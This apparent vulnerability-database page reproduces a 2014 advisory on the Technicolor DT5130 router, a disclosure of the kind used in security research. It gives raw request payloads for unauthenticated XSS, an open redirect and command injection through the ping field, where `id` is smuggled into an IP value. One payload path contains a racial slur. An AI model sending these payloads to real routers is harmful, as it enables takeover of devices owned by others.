Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitpackCrashEXPLOITPACK:C674381FE52E1DD210DF468C763FF430
HistoryDec 04, 2014 - 12:00 a.m.

Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities

2014-12-0400:00:00
Crash
18

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

JSON

Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities

Product: Wireless N ADSL 2/2+ Modem Router
Firmware Version : V2.05.C29GV
Modem Type : ADSL2+ Router
Modem Vendor : Technicolor
Model: DT5130

Bugs:
1- Unauth Xss - CVE-2014-9142
user=teste&password=teste&
userlevel=15&refer=%2Fnigga.html&failrefer=/basicauth.cgi?index.html?failrefer=<script></script><script>alert('TESTE')</script>"%0A&login=Login&password=pass&refer=/index.html&user=teste&userlevel=15&login=Login

2- Arbitrari URL redirect - CVE-2014-9143
failrefer=http://blog.dclabs.com.br&login=Login&password=
pass&refer=/index.html&user=1&userlevel=15

3- Command Injection in ping field - CVE-2014-9144
setobject_token=SESSION_CONTRACT_TOKEN_TAG%3D0123456789012345&setobject_ip=s1.3.6.1.4.1.283.1000.2.1.6.4.1.0%3Dwww.google.com.br|`id`&setobject_ping=i1.3.6.1.4.1.283.1000.2.1.6.4.2.0%3D1&getobject_result=IGNORE


-- 
Ewerson Guimaraes (Crash)
Pentester/Researcher
DcLabs / Ibliss  Security Team
www.dclabs.com.br / www.ibliss.com.br

Related

securityvulns 2
packetstorm 1
exploitdb 1
prion 3
zdt 1
cve 3
checkpoint_advisories 1
securityvulns
securityvulns
Wireless N ADSL 2/2+ Modem Router - DT5130 - Xss / URL Redirect / Command Injection
2014-12-29 00:00:00
Technicolor DT5130 routers multiple security vulnerabilities
2014-12-29 00:00:00
packetstorm
packetstorm
ADSL2+ 2.05.C29GV XSS / URL Redirect / Command Injection
2014-12-03 00:00:00
exploitdb
exploitdb
Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities
2014-12-04 00:00:00
prion
prion
Cross site scripting
2014-12-05 15:59:00
Open redirect
2014-12-05 15:59:00
Design/Logic Flaw
2014-12-05 15:59:00
zdt
zdt
Technicolor DT5130 V2.05.C29GV - Multiple Vulnerabilities
2014-12-04 00:00:00
cve
cve
CVE-2014-9142
2014-12-05 15:59:00
CVE-2014-9143
2014-12-05 15:59:00
CVE-2014-9144
2014-12-05 15:59:00
checkpoint_advisories
checkpoint_advisories
Technicolor DT5130 Router Command Injection (CVE-2014-9144)
2014-12-21 00:00:00

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

JSON
Related for EXPLOITPACK:C674381FE52E1DD210DF468C763FF430
securityvulns2packetstorm1exploitdb1prion3zdt1cve3checkpoint_advisories1